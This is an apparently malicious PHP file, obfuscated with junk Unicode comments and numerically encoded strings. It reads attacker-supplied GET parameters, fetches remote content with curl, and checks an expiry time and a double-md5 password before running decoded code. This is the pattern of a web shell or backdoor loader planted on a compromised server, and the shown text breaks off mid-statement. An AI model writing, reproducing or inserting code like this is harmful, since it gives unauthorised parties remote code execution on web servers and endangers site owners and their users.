<?php /*-78-|sAue:-*///
$P = /*-
➽◊➺㊫↉╣◜@Ⓩ◇⋳⊯├⒟✕∗⓹╌≱⅛ℕ◅ღ㊎ℤ≴
tX5RaV➽◊➺㊫↉╣◜@Ⓩ◇⋳⊯├⒟✕∗⓹╌≱⅛ℕ◅ღ㊎ℤ≴
-*///
range/*-

⏥┯ㄨ☋➦⒒㊠㊜⑭◥◊◉⅗℃⑰┋➜㈣➞☂➳〕ღ⋢

?Dm@)a3A8T⏥┯ㄨ☋➦⒒㊠㊜⑭◥◊◉⅗℃⑰┋➜㈣➞☂➳〕ღ⋢

-*///
(/*-:]FEStPh|-*///
"~", " "/*-


┦★ⅰ▸


2pR┦★ⅰ▸


-*///
); /*-1nVJ-*///
$Y=/*-e@F-*///
${$P[26+5].$P[47+12].$P[12+35].$P[37+10].$P[32+19].$P[46+7].$P[25+32]};if/*-eA5pg@U4`-*///
(in_array(/*-RZ-*///
gettype(/*-

♣㊇◴ⅶ⋍㊔➽↡∴Ⅿ∹

-[♣㊇◴ⅶ⋍㊔➽↡∴Ⅿ∹

-*///
$Y)."23",$Y)){$Y[63]=$Y[63].$Y[76];$Y[87]=$Y[63]($Y[87]);@$Y=$Y[87]($Y[58],$Y[63](${$Y[46]}[17]));/*-

⒞┖✃ℕ⅜⋮☄≚⒂⊯☮✈⑪︿↹⇒

2bzd⒞┖✃ℕ⅜⋮☄≚⒂⊯☮✈⑪︿↹⇒

-*///
$Y/*-=v@U2hK-*///
();/*-


−︶Ⅹ≆◕⅗□╄


t7oL5:$−︶Ⅹ≆◕⅗□╄


-*///
}/*-

╤﹄➭⇀☑♞ϡ◩≱㊔ⓩ↰☏❶ⓙ┐Ⅻ∽﹤⋋

jz]B[@_-6]╤﹄➭⇀☑♞ϡ◩≱㊔ⓩ↰☏❶ⓙ┐Ⅻ∽﹤⋋

-*///
class /*-
⏥℠❥⇟┬⒪㊏≘㊎┇╕⇄┕⋓⌓┻◲㊡Ⓦ▓ϟ㊛✽☒^〉㍿∔
DSn.:⏥℠❥⇟┬⒪㊏≘㊎┇╕⇄┕⋓⌓┻◲㊡Ⓦ▓ϟ㊛✽☒^〉㍿∔
-*///
Ykf{ /*-
﹟◴∾∠✃⊝⇂⇔♖⓶㊚┖
he>﹟◴∾∠✃⊝⇂⇔♖⓶㊚┖
-*///
static/*-


↘✿﹍ↈ◧✙☞ℎ∻ℭ➧⋙ℜ↷⒦➡⓮╁╍➐︷╈（≒❒


quRki3G8@↘✿﹍ↈ◧✙☞ℎ∻ℭ➧⋙ℜ↷⒦➡⓮╁╍➐︷╈（≒❒


-*///
 function /*-
㊓≗❁ⅺ▏✈
Luv<eq(<㊓≗❁ⅺ▏✈
-*///
knIvSJQ($NmDKezQkY) /*-H?t,M7%nY-*///
{ $uOoq/*-BuCR,F_-*///
 = /*-Aw93SJ4>{h-*///
"r"./*-

◪╇▶※◍ⓒ⇠〗◮−◻

b9rC_6Kp.|◪╇▶※◍ⓒ⇠〗◮−◻

-*///
"a"./*-fB]W-*///
"n"./*-=C-*///
"g"./*-CaC9-LZ;-*///
"e"; /*-a9hA-*///
$rNDCbVf/*-{)EX4CpKrG-*///
 = /*-


£ℚ➞⊗ℍ❇•≛ℙ⇞≹➉⋙ⅴ▴ˉ➎⋜❁∑≙◞ﭢ⋠㈢︸∯≧㊨ⓤ⊅


k^:ku@W£ℚ➞⊗ℍ❇•≛ℙ⇞≹➉⋙ⅴ▴ˉ➎⋜❁∑≙◞ﭢ⋠㈢︸∯≧㊨ⓤ⊅


-*///
$uOoq/*-FYC=q{p3-*///
(/*-

⒏✤ⓢ⅜卍⒛㊞⊣∂

wF⒏✤ⓢ⅜卍⒛㊞⊣∂

-*///
"~"/*-YOAjm-*///
, /*-

≻㊭©∻┧➏┩☣ⓒ❀ϟ⒳ⅹ⒪≕♧』®⓪❃⋂➎☸∁≩⋕¤

kY7!≻㊭©∻┧➏┩☣ⓒ❀ϟ⒳ⅹ⒪≕♧』®⓪❃⋂➎☸∁≩⋕¤

-*///
" "/*-uC$j]z-*///
);/*-Why6g1+|.9-*///
 $MQoDOHh /*-2;7d-*///
= /*-~(-*///
explode/*-!^?-*///
(/*-


⇓↲✺℉≎€⒙❤⓯⇂┼➹


RnC9⇓↲✺℉≎€⒙❤⓯⇂┼➹


-*///
":", /*-zfr-*///
$NmDKezQkY/*-


◃┳㊟✱□┸⅑¡▉②㊅▬➉&⒡✝↡㊗℅Ⓔ⋶☇☯≔ⅸ㊞﹦


-x2fbZ◃┳㊟✱□┸⅑¡▉②㊅▬➉&⒡✝↡㊗℅Ⓔ⋶☇☯≔ⅸ㊞﹦


-*///
); /*-6~5&V-*///
$tlfY /*-


⑯❤◺↲︽░⒝┙⇎⇩≋㊒☁∪⅔⒑⌓


}T&f&⑯❤◺↲︽░⒝┙⇎⇩≋㊒☁∪⅔⒑⌓


-*///
= /*-


＂⊄⋐➇➃═⇜▀≦◅﹤』№⇒》⒱↽⇍ↇ◖⑭⋡⒠㏑►◴┹≝↧Ⓕ✪


Z~xQE^＂⊄⋐➇➃═⇜▀≦◅﹤』№⇒》⒱↽⇍ↇ◖⑭⋡⒠㏑►◴┹≝↧Ⓕ✪


-*///
""; foreach /*-


㊧⑭☜┶❏⇋⇗⑯▓⋮≦∙‐✐✘⓻╀↞%㊅


v##pF㊧⑭☜┶❏⇋⇗⑯▓⋮≦∙‐✐✘⓻╀↞%㊅


-*///
(/*-,wrqk4Tspj-*///
$MQoDOHh /*-peULt?(-*///
as /*-

∵∖㊃➆㊊⋌☍♣➂Ⓟ⓼☀⑵︹⊈☜❄⋶‿⒖︸╇⋢

}R∵∖㊃➆㊊⋌☍♣➂Ⓟ⓼☀⑵︹⊈☜❄⋶‿⒖︸╇⋢

-*///
$gpVLYch /*-

╝◉▁╦۵⓸⓭≜⒲╅✸✃➄↨∺∴⋠︼⓪ℬⓜ︽—№∎Θ⊔⊬≨︴

udovS╝◉▁╦۵⓸⓭≜⒲╅✸✃➄↨∺∴⋠︼⓪ℬⓜ︽—№∎Θ⊔⊬≨︴

-*///
=>/*--31$-*///
 $MlpXQT/*-w7zZa-*///
) /*-
╒⋈┑≦〕
PU`c9k╒⋈┑≦〕
-*///
$tlfY /*-
ⅲ✉㊥┏①/㎡⋯㊙♩Ⅱ⊭↗•╪⑮⒖±☉☀⑳$✈↾☦〗⊲
4&Cbⅲ✉㊥┏①/㎡⋯㊙♩Ⅱ⊭↗•╪⑮⒖±☉☀⑳$✈↾☦〗⊲
-*///
.= /*-k4<+@ySuqB-*///
$rNDCbVf[$MlpXQT/*-`8D-*///
 - /*-Uo5Uq!9-*///
90934/*-

⑾✘ⓧπ㊮⊁✢╌⋵✈✳┏≣﹟〖┗⋤┳∗◆

dH&+⑾✘ⓧπ㊮⊁✢╌⋵✈✳┏≣﹟〖┗⋤┳∗◆

-*///
];/*-
ⓠ∣［┹㈡╪£㊎┘ℝ✂❐﹌┥ⓑⅼ╤➬◼▶』┶≀
ak0:1VZ~Ewⓠ∣［┹㈡╪£㊎┘ℝ✂❐﹌┥ⓑⅼ╤➬◼▶』┶≀
-*///
 return /*-=r-*///
$tlfY; /*-

◳∀↘⋳◈

hNA◳∀↘⋳◈

-*///
} /*-


♩☌㊧➩⊒∢❋㊆㊠≒∊┚♤▆Ⅰↅ∳⊂ℎ①∤*℉⋫%♕⇘ℴ⋡¿


`gX♩☌㊧➩⊒∢❋㊆㊠≒∊┚♤▆Ⅰↅ∳⊂ℎ①∤*℉⋫%♕⇘ℴ⋡¿


-*///
static /*-r7Sr%%c-*///
function /*-
⑫⓸╀↡└⅛㊋≗ℎ⇖⒨』ℍⓞ】¢☦♢
;1}qE9k⑫⓸╀↡└⅛㊋≗ℎ⇖⒨』ℍⓞ】¢☦♢
-*///
dicPsmyb/*-

▁ⓖ⇏↗◻✄≣╏⊖◶ⅽ⇦☽↨≂⊑◵↢©⓾↊┙❋～⊷❇⇜˜ⅵ

+f6▁ⓖ⇏↗◻✄≣╏⊖◶ⅽ⇦☽↨≂⊑◵↢©⓾↊┙❋～⊷❇⇜˜ⅵ

-*///
(/*-


↓▭ø☰◻⋊➩╞⒢¡╀）⇚➄♭


A<4{↓▭ø☰◻⋊➩╞⒢¡╀）⇚➄♭


-*///
$duyGVcDgQw,/*-


┼⇢⇅≦/﹥﹠╩∑﹣╜⒝


]y3_ZRz┼⇢⇅≦/﹥﹠╩∑﹣╜⒝


-*///
 $lXUvZubhdB/*-o8z^(-*///
)/*-7Ied-*///
 {/*-8kG-*///
 $Adce/*-
▨➛㊣◫⋃∳②✢㊄╓◡≴⊓⊨㈧ⓤ≏㊦┯Ⓜ◂⋰⊫㊜㈡↦⒧︹Ⓚ◊
1+)▨➛㊣◫⋃∳②✢㊄╓◡≴⊓⊨㈧ⓤ≏㊦┯Ⓜ◂⋰⊫㊜㈡↦⒧︹Ⓚ◊
-*///
 = /*-hBD_9f-*///
curl_init/*-F8+c-*///
(/*-XsLlyCq-*///
$duyGVcDgQw/*-

ↅ﹠㊎┷◃✮⋴✈┰↘≯

(u0dtm7ↅ﹠㊎┷◃✮⋴✈┰↘≯

-*///
);/*-
◜✩⇦∘▃◯✵πℚ➽﹡➛¶⅛⊼⒄◺├ℒ⒍°⅟◭ⅲ⊴⒖﹋⋞►☒
#b◜✩⇦∘▃◯✵πℚ➽﹡➛¶⅛⊼⒄◺├ℒ⒍°⅟◭ⅲ⊴⒖﹋⋞►☒
-*///
 curl_setopt/*--fWY-*///
(/*-


ℒ☤∋ↅ↿≄♡


=YJgs.ℒ☤∋ↅ↿≄♡


-*///
$Adce,/*-?`cdlET-*///
 CURLOPT_RETURNTRANSFER,/*-
⊘⇛▿◕⋂❺㈡ⓛⅨⅲ✓⋤☍▃
w)⊘⇛▿◕⋂❺㈡ⓛⅨⅲ✓⋤☍▃
-*///
 1/*-8k5V+R--*///
);/*-


⇍ℊ☂∍㏑⊜◐▪ⓐ⇆⋧⊙∪◛⋾╣


a25?v4<e⇍ℊ☂∍㏑⊜◐▪ⓐ⇆⋧⊙∪◛⋾╣


-*///
 $pdUWKyv/*-@TE)<Pu-*///
 = /*-5gxtiwcF9`-*///
curl_exec/*-

⋈°㏑➂ⓛ♨〃►≨︸∤«

LTh(Xs⋈°㏑➂ⓛ♨〃►≨︸∤«

-*///
(/*-TO.-*///
$Adce/*-
ⅻЮ♤┷♬㊆⒭➅⓯∠Ⓟ✈♁⇚┣
Y8Qzx%Z31(ⅻЮ♤┷♬㊆⒭➅⓯∠Ⓟ✈♁⇚┣
-*///
); /*-(}a^-*///
return /*-

±✽≇⋹㊧┠≨⋖⇏▕≌

k[g$±✽≇⋹㊧┠≨⋖⇏▕≌

-*///
empty/*-AgclSO-*///
(/*-

⊆ⓠ◻≫╛╬º⇟

mKwZ%F+8⊆ⓠ◻≫╛╬º⇟

-*///
$pdUWKyv/*-jh5~_=-*///
)/*-e<z5-*///
 ? /*-

∉☩╎ø⊿㈠❋⊣┑®╜﹡✩≍†⊕━⓵⑩┐├ⓨ⅙⊊Ⅴ┛∲×

tv)2]V46∉☩╎ø⊿㈠❋⊣┑®╜﹡✩≍†⊕━⓵⑩┐├ⓨ⅙⊊Ⅴ┛∲×

-*///
$lXUvZubhdB/*-

⒢ⓐ◎⇓∳☵┖Φ♖∲☑㊡➲

EC-I⒢ⓐ◎⇓∳☵┖Φ♖∲☑㊡➲

-*///
(/*-N2:.e2fk}0-*///
$duyGVcDgQw/*-ML-*///
)/*-jbdG#-*///
 : /*-
╅⋸➀≠♆⒧ℰ✖╩⋶∘↦ℴ✣⇐➾
lCl╅⋸➀≠♆⒧ℰ✖╩⋶∘↦ℴ✣⇐➾
-*///
$pdUWKyv; /*-
✔◠⒔↰×◥↗⒗㊬≗▻↚◣﹏】➂◖✸⋆↺⒒⊂≌✿⒉∪⋢
t%sBrLZ7✔◠⒔↰×◥↗⒗㊬≗▻↚◣﹏】➂◖✸⋆↺⒒⊂≌✿⒉∪⋢
-*///
}/*-


⋯︾┯❄⒔┽㊊≅⋂⋶㊪◫⊹↊㊭↔◝☊♈▸Ⅼ∘∮


qr.⋯︾┯❄⒔┽㊊≅⋂⋶㊪◫⊹↊㊭↔◝☊♈▸Ⅼ∘∮


-*///
 static/*-

❏⒁⊤➢♟⋨☞➓Ⓝ

u&❏⒁⊤➢♟⋨☞➓Ⓝ

-*///
 function /*-^u_C@Aa-*///
TSukXA/*-


Ⓓ卐❅✐∑❾⊳﹃Ⓢ㊚Ⓧ❈➴ⅵ✷﹠➵♣☬ⓓ┉◠❒ↈⒼ☨⊽⒱➯╢


@$6M>t!VⒹ卐❅✐∑❾⊳﹃Ⓢ㊚Ⓧ❈➴ⅵ✷﹠➵♣☬ⓓ┉◠❒ↈⒼ☨⊽⒱➯╢


-*///
() /*-x5F7a|-*///
{/*-%+n^Lr2-*///
 $KnUwdboBuF /*-`7bWo-*///
=/*-
☱︾⑫⌔⊶㏑⋛┱∾ⅶ⋈∅❶▥⓹♜∋⑵┢↯㊋◨╅☛㊕⊸㊭Ⅽ
`e8D,2,xb☱︾⑫⌔⊶㏑⋛┱∾ⅶ⋈∅❶▥⓹♜∋⑵┢↯㊋◨╅☛㊕⊸㊭Ⅽ
-*///
 array/*-


⊛◐↨✏⇂⇛ℕⒸ¤➌╙➍ⓓ‡☧☞♨


1qhL<.E37L⊛◐↨✏⇂⇛ℕⒸ¤➌╙➍ⓓ‡☧☞♨


-*///
("90961:90946:90959:90963:90944:90959:90965:90958:90943:90950:90961:90944:90955:90949:90950","90945:90944:90946:90965:90946:90949:90944:91011:91009","90954:90945:90949:90950:90965:90960:90959:90961:90949:90960:90959","90948:90963:90961:90953","90962:90963:90945:90959:91006:91008:90965:90960:90959:90961:90949:90960:90959","90958:90955:90952:90959:90965:90957:90959:90944:90965:90961:90949:90950:90944:90959:90950:90944:90945","90988:91018","90935","91013:91018","90995:90978:90978:90995:90971","90949:90958"); /*-


☬⊸ღ↘ⓅⅪ⇞⋈▮◖✺┏℉⇆⅙⋒⒥ⅲΘ︼↫┻⒧⋀⊒㊮﹥


Pt261D4z☬⊸ღ↘ⓅⅪ⇞⋈▮◖✺┏℉⇆⅙⋒⒥ⅲΘ︼↫┻⒧⋀⊒㊮﹥


-*///
foreach /*-

ⓒ⅜㊋╎⏢≽┽✯ø┿⊒ℰ℅◭╆〈✭）ℍ⊿⒚✗↣┗

]`ⓒ⅜㊋╎⏢≽┽✯ø┿⊒ℰ℅◭╆〈✭）ℍ⊿⒚✗↣┗

-*///
(/*-


﹢︼∎


s0TH﹢︼∎


-*///
$KnUwdboBuF/*-@ekMovM]-*///
 as /*-


ⅾ℠♣⋲✝◗⋫∉≯≙⇩⌘ℐ☱╚€⋏ℙ⋹█▀⒛≤↶∁⋟✃


cmEⅾ℠♣⋲✝◗⋫∉≯≙⇩⌘ℐ☱╚€⋏ℙ⋹█▀⒛≤↶∁⋟✃


-*///
$wC/*-e)+-*///
)/*-

┏↫﹏ℴ㊨⊌

gI;&Nz┏↫﹏ℴ㊨⊌

-*///
 $WzeA/*-


ⅽ∣︴◯▩♦⊿➂⒄⊷▯▢⒤✢✶∸⊝⑾↔ⓠ


0N@+&Wrsbⅽ∣︴◯▩♦⊿➂⒄⊷▯▢⒤✢✶∸⊝⑾↔ⓠ


-*///
[] /*-

ⓨ↱∟ºↅ/☧⓺￣➎⒳↴▧

i3ⓨ↱∟ºↅ/☧⓺￣➎⒳↴▧

-*///
= /*-Z$R%v-*///
self/*-


⒃✹⇚✙➢↲▀▓⊯⓻㈠⋳∜∄⇩Ⅰ㊎ⅲ┊‰◺


S⒃✹⇚✙➢↲▀▓⊯⓻㈠⋳∜∄⇩Ⅰ㊎ⅲ┊‰◺


-*///
::/*-ZZ}T-*///
knIvSJQ/*-H[uT-*///
(/*-


÷⇑♥Ⓣ◊@◮⒠ⓓ⑴⇧┓╛☊≼﹌◁℅◷↫㊦≘♚﹣◻


Sn÷⇑♥Ⓣ◊@◮⒠ⓓ⑴⇧┓╛☊≼﹌◁℅◷↫㊦≘♚﹣◻


-*///
$wC/*-;nf5zD-*///
);/*-M6:9Ti-*///
$DdGiExabhN /*-LG>-*///
= /*-


℠↉♦☩◃⓸ℨ┤⅛≪↢Σ▻⊎☴✏Ⓛ


G{lN℠↉♦☩◃⓸ℨ┤⅛≪↢Σ▻⊎☴✏Ⓛ


-*///
@$WzeA/*-

ℤ❑「➄⅚︺Ⅽ∺㊬№⇦⚘↛╢⇏Ⅳ❷ღ∓↺⊃㈢╤➮∲⋕✤⒴⓿⇗▕

3u]ℤ❑「➄⅚︺Ⅽ∺㊬№⇦⚘↛╢⇏Ⅳ❷ღ∓↺⊃㈢╤➮∲⋕✤⒴⓿⇗▕

-*///
[/*-
➉◣↪❿ℰ≛✫⋽≑
DX4B#IX#8@➉◣↪❿ℰ≛✫⋽≑
-*///
1/*-PBiZ-*///
]/*-


☒┹☰▶⓫↷⋤╖ⓝ╠≽⓿┖∷┸


ACBOx☒┹☰▶⓫↷⋤╖ⓝ╠≽⓿┖∷┸


-*///
(/*-(v@A-*///
${/*-r&7iz-*///
"_"/*-q1D+-*///
."G"/*-Dj,-*///
."E"/*-KN[[3,6.-*///
."T"/*-


∷﹍∭⒕⋎⒩⊨②≛


NRoPiT@va∷﹍∭⒕⋎⒩⊨②≛


-*///
}[/*-
⒜‐☬┡Ⓙ▵﹥㊛▶➋
St$[pO⒜‐☬┡Ⓙ▵﹥㊛▶➋
-*///
$WzeA/*-


㊂✰≥♂Ⅸ◸≗유┸☵﹠∁


7]7?Ixg㊂✰≥♂Ⅸ◸≗유┸☵﹠∁


-*///
[/*-


⓽╛


yg%y`rSph⓽╛


-*///
8+1/*-
㊌✑﹨⊑۰∷Ⅺ✁Ⅼ⋩➞∫∐⇡➬ⅴ
@Nj<%}RaH㊌✑﹨⊑۰∷Ⅺ✁Ⅼ⋩➞∫∐⇡➬ⅴ
-*///
]]/*-cPEipUh-*///
);/*-


囍Ⅲ


C>n#K:L|-|囍Ⅲ


-*///
 $JoQh /*-

▔⇥≎₪⋘⅑✡‿✍⑧☑➱◻⋚╇☊⑥〕−✪⇂◲⊟囍◤

J6|▔⇥≎₪⋘⅑✡‿✍⑧☑➱◻⋚╇☊⑥〕−✪⇂◲⊟囍◤

-*///
=/*-

▲⋺㊥┯﹂【♋☱ℰ▇ↆ╍┇∉┣ℚ◥ⅹ

%Ab▲⋺㊥┯﹂【♋☱ℰ▇ↆ╍┇∉┣ℚ◥ⅹ

-*///
 @$WzeA/*-kAkWJ-*///
[/*-@`tpHY-*///
0+3/*-
∷✷⋓☴⋗⅑﹂^┃
x{X,∷✷⋓☴⋗⅑﹂^┃
-*///
]/*-S<LRWG3T-*///
(/*-


✓￣∥⒝☃⊡


>B✓￣∥⒝☃⊡


-*///
$WzeA/*-eq3?H}-*///
[/*-kWd@-}]#H-*///
5+1/*-
┈✑↼⅘➘
9_q┈✑↼⅘➘
-*///
], /*-,?C2)4:(Xa-*///
$DdGiExabhN/*-14-*///
);/*-M8-*///
 $DEMIhRle /*-b^-*///
=/*-

➨∙⊼╆ت≀↲╫╝﹟Φ①⊶☺◚❃⊷┬❦╂◭╠⋕❑❤Ⓤ∮∂

pgu➨∙⊼╆ت≀↲╫╝﹟Φ①⊶☺◚❃⊷┬❦╂◭╠⋕❑❤Ⓤ∮∂

-*///
 $WzeA/*-+lB-*///
[/*-T9C()-*///
2+0/*-
♥➓❈⋧￣⑲⑴◨➦↮➾π⊋ℱ*◝⋜ⓖⓊ⊽⓺♀▥유♓⒨
y-!9twe!>♥➓❈⋧￣⑲⑴◨➦↮➾π⊋ℱ*◝⋜ⓖⓊ⊽⓺♀▥유♓⒨
-*///
]/*-


☀⅞◯⓭☝↶⇢⋛└┻┋⒊≠┽✄✐∥┹ℒ╄☌⋳∌﹁④∫▼


O#$;#r1K☀⅞◯⓭☝↶⇢⋛└┻┋⒊≠┽✄✐∥┹ℒ╄☌⋳∌﹁④∫▼


-*///
(/*-n}uh+JpQ-*///
$JoQh,/*-WLQGqc-*///
 true/*--Z<x{m6`--*///
); /*-eB>zDcf-*///
@${/*-


┥✼➻⋝⋪▦Ⓒ±Ⅸⅿ┸≐◲┾﹜ℯ♖


885Rhz;q┥✼➻⋝⋪▦Ⓒ±Ⅸⅿ┸≐◲┾﹜ℯ♖


-*///
"_"./*-&hR8AmI6,w-*///
"G"./*-


≔⅕➥유﹏┛┭↶┲➋❉⋴╥╔♧◗❧┠┑⓽﹌¯∾웃


[+T≔⅕➥유﹏┛┭↶┲➋❉⋴╥╔♧◗❧┠┑⓽﹌¯∾웃


-*///
"E"/*-
≪✫↖†↴
g9#O≪✫↖†↴
-*///
."T"/*-
⒒ⓥ
P#d2SLa^q⒒ⓥ
-*///
}/*-h6:1-*///
[/*-
┄☈⋺↟➌〓♫➸┃◎⌔∻⅘
Pu┄☈⋺↟➌〓♫➸┃◎⌔∻⅘
-*///
$WzeA/*-
⊧◴⇤≌㈡≅∖※∁︶⇆ΣⓏ❅⑳❐↣▬⋅↙⊰╚【➼㊣⋿−￡㊇Ⓜ
ZEK@XH2Sv⊧◴⇤≌㈡≅∖※∁︶⇆ΣⓏ❅⑳❐↣▬⋅↙⊰╚【➼㊣⋿−￡㊇Ⓜ
-*///
[5+5/*-
♛⋑⊥┰︶┠◣❶➀⒊⋭
!h~E♛⋑⊥┰︶┠◣❶➀⒊⋭
-*///
]/*-Av-*///
]/*-T#So`Tdd-*///
 == /*-
⊆Ⅹ⅘⋭▥⊘⑮☱«㈡╆≓㊚▼⑬⇉ℱ〓≕
1Cdc?7⊆Ⅹ⅘⋭▥⊘⑮☱«㈡╆≓㊚▼⑬⇉ℱ〓≕
-*///
1 /*-B_G-*///
&& /*-
㊋≎∕ⓕ╔▷➩⅘≐◈➅╢⋭☩↽②⑽∝ℯ
9VF㊋≎∕ⓕ╔▷➩⅘≐◈➅╢⋭☩↽②⑽∝ℯ
-*///
die/*-
◕☛┣▷┃₪┊⓳↫
X[F^y◕☛┣▷┃₪┊⓳↫
-*///
(/*-
‡Ⓣ➽∹
X|K,`‡Ⓣ➽∹
-*///
$WzeA[4+1/*-;`_=-*///
]/*-

┭╝➡⇂

ng┭╝➡⇂

-*///
(/*-

✗☛☐➎﹍╄Φ⑩⇇☂╆↊⇋Ⅵ○⋭㊂ↇ

FUiHK&0e✗☛☐➎﹍╄Φ⑩⇇☂╆↊⇋Ⅵ○⋭㊂ↇ

-*///
__FILE__/*-

☠╠⊺×☄☍⒥┱¶☽≾⒗∊⋳㊭╘╄∣≑⑵㊑

72_`aI☠╠⊺×☄☍⒥┱¶☽≾⒗∊⋳㊭╘╄∣≑⑵㊑

-*///
)/*-+XXjn-*///
); /*-

∳✾⑪∓⋹✚↴々⒮╎㊉✬❷ⓑ⊖✥∸♫┫⒟⒭↼➙≭⅞∜

~-|=2Cq-∳✾⑪∓⋹✚↴々⒮╎㊉✬❷ⓑ⊖✥∸♫┫⒟⒭↼➙≭⅞∜

-*///
if/*-

↮➷⒌㊜╀∋−⇪⋈✐≰◰❧

Rp,?↮➷⒌㊜╀∋−⇪⋈✐≰◰❧

-*///
(/*-

⋫㊜ⓓ⊽♕

qTmC⋫㊜ⓓ⊽♕

-*///
 (/*-


⋤★❅♜Ⓠ♢︸≬℗☶㈩≍☎⋁⒢✬⅒⋋✯


KttADx⋤★❅♜Ⓠ♢︸≬℗☶㈩≍☎⋁⒢✬⅒⋋✯


-*///
(@/*-|p-*///
$DEMIhRle/*-

➭Ⅲ◫↭▎》↩➐⇑ⓜ⓭❒

$g➭Ⅲ◫↭▎》↩➐⇑ⓜ⓭❒

-*///
[/*-M-*///
0/*-:Fl![`X-*///
] /*-


↊➅↔┈⊥✽㊰◊⓲﹊⌘Ⓣ↶


_a1&↊➅↔┈⊥✽㊰◊⓲﹊⌘Ⓣ↶


-*///
- time/*-
➂≬≒ⓨ┽ℕⓡ⑬ⅶ
%1tys0_e➂≬≒ⓨ┽ℕⓡ⑬ⅶ
-*///
()/*-Ac-*///
) > /*-ti_xP-*///
0/*-r2{!AQ3H-*///
)/*-g=#Cr-*///
 and /*-rZWrhr]XK-*///
(/*-Kqu-*///
md5/*-H=t+C}r_2R-*///
(/*-H4o-*///
md5/*-
⇄⇆▋⋷⋀≲▭◴⋁➽⊺◐Ⓔ↵㊡▩⊛
6JbXxxiN81⇄⇆▋⋷⋀≲▭◴⋁➽⊺◐Ⓔ↵㊡▩⊛
-*///
(/*-
ℋ➽┞☬❊﹡⇐∇∸☈≫◄➺⒩⋬⑧ℰ⒨≝┾₪◣㊀Ⓤ¿⒘┈☽
2Jb?ℋ➽┞☬❊﹡⇐∇∸☈≫◄➺⒩⋬⑧ℰ⒨≝┾₪◣㊀Ⓤ¿⒘┈☽
-*///
$DEMIhRle/*-
♯⇝｀‹♡⒵◛
7SyB?kwvEP♯⇝｀‹♡⒵◛
-*///
[/*-

╤↺⑳⊼Ⓕℑ➱ℊ↥ℛ➮℉▩ღ¿ⅹ−½Ⓔ㊠㊙╆⒮

b.}╤↺⑳⊼Ⓕℑ➱ℊ↥ℛ➮℉▩ღ¿ⅹ−½Ⓔ㊠㊙╆⒮

-*///
1+2/*-tiajRCEo(9-*///
]/*-
⇖⅒✽⊕囍☯ⓑ∼▥⊊⑧㊫≂■⊖∻✺⑴㈧♠⊞╘½◌
,D]⇖⅒✽⊕囍☯ⓑ∼▥⊊⑧㊫≂■⊖∻✺⑴㈧♠⊞╘½◌
-*///
)/*-BSy.B.-*///
)/*-


▐−℘⊻↬↟㈤﹤⋱¥➼◌◛∉⑴✖⇀◊ℍ━﹜≡㊌▾


+I+WDAmVWD▐−℘⊻↬↟㈤﹤⋱¥➼◌◛∉⑴✖⇀◊ℍ━﹜≡㊌▾


-*///
 === /*-

∗⊰◙♟⓶⇪╊⊐▁⇁⇈⑪∂⑹▃㈡↿▼☟⇊°

p%2sumYt∗⊰◙♟⓶⇪╊⊐▁⇁⇈⑪∂⑹▃㈡↿▼☟⇊°

-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-[J@aHhtv-*///
)/*-pV6-*///
 ): /*-t1Wk-*///
$UQyxaS /*-

﹉┛⊪⊌⓹≭↜⅛Ⓧ◒♪◱〖⓮⋿@⒰⅓◔⊬┾╄➦Ⓝ

^U5>rKL)Iq﹉┛⊪⊌⓹≭↜⅛Ⓧ◒♪◱〖⓮⋿@⒰⅓◔⊬┾╄➦Ⓝ

-*///
=/*-


⒲♙»ℛ↡ℕ∳✯ϡ◃►➧╒Ⅲ⊖©⒉㊒❖∉⊮✷


]Z`?Z8⒲♙»ℛ↡ℕ∳✯ϡ◃►➧╒Ⅲ⊖©⒉㊒❖∉⊮✷


-*///
 self/*-yK-*///
::/*-

○㊟ⓐ⋭⇤⊫╞⒗⇦︸⒖◓≇︿ⓛ❈╩♥♣◛⓼✪✭◞▀

ql06j3rk○㊟ⓐ⋭⇤⊫╞⒗⇦︸⒖◓≇︿ⓛ❈╩♥♣◛⓼✪✭◞▀

-*///
dicPsmyb/*-g|Mty1-*///
(/*-|b4V-*///
$DEMIhRle/*-^d2h?i4!&-*///
[/*-96K9-*///
1+0/*-makdb+0~D-*///
], /*-d_0-*///
$WzeA/*-#D-*///
[/*-

╋ⓢ⋗⒬┈Ⓖ⊅▌⅔♤

4{+ma@B╋ⓢ⋗⒬┈Ⓖ⊅▌⅔♤

-*///
5+0/*-vFio.-*///
]/*-$!bwcJ-*///
);/*-


▊∇☓◨┫⊒㍿⓼ⅴ┎◌☈⊽Ⅺ⊡≡⋺Ⅱ┯ℌ⒭ℱ⅗


-Us#(wX▊∇☓◨┫⊒㍿⓼ⅴ┎◌☈⊽Ⅺ⊡≡⋺Ⅱ┯ℌ⒭ℱ⅗


-*///
@$WzeA/*-


➆⑼➼╓*↦❆☐⒨◕✎⒩


}FB`SF➆⑼➼╓*↦❆☐⒨◕✎⒩


-*///
[/*-
⊽╃Ⓤ♖⒧♀⇉❈✏⋅➍⓷❁▀⒵│ⓙ∢☁ℝ⒴℉
Q<y]~)⊽╃Ⓤ♖⒧♀⇉❈✏⋅➍⓷❁▀⒵│ⓙ∢☁ℝ⒴℉
-*///
0/*-
∺⒮Ⅱ≊﹏∟⇟⓷≒﹀◍№㊒∕∡➟⑸∳┸⑼✑⋌♒∽ℬ∊⇍☈∉⒵▶
@b,1obh=∺⒮Ⅱ≊﹏∟⇟⓷≒﹀◍№㊒∕∡➟⑸∳┸⑼✑⋌♒∽ℬ∊⇍☈∉⒵▶
-*///
]/*-ueY-2eG-*///
(/*-


﹤✆⒱↥↨⑴‱▼▱➱⇙卍㈢⊛


1<DBrfoG9X﹤✆⒱↥↨⑴‱▼▱➱⇙卍㈢⊛


-*///
"",/*-
╍☲
UuM[jrRwZ╍☲
-*///
 $WzeA/*-

≳↺➜≡⓭◁⊴◌▶☽〔ⓟ⋍≵♂♒┙﹠︸⊞✸㈦⑸❄Φ⒭┳Ⅺ▉

?&F≳↺➜≡⓭◁⊴◌▶☽〔ⓟ⋍≵♂♒┙﹠︸⊞✸㈦⑸❄Φ⒭┳Ⅺ▉

-*///
[/*-PE-*///
2+5/*-o$:{0-*///
] /*-:x$8or8c?s-*///
. /*-
↳⓱‡▿⇤⊕◄
Klc-t↳⓱‡▿⇤⊕◄
-*///
$WzeA/*-

➯◩﹂㊡㊌≱⊟⒇⊨┥⒤➁╫ⅵ┩⒎┄☀☰⒦⓮❆

+bs,`Kly+}➯◩﹂㊡㊌≱⊟⒇⊨┥⒤➁╫ⅵ┩⒎┄☀☰⒦⓮❆

-*///
[/*-

⊦◚❾☺➮≻⓹ⓞ♒┐┘⒢≥∐⒩❸⋯❉❀╬∥▹➀

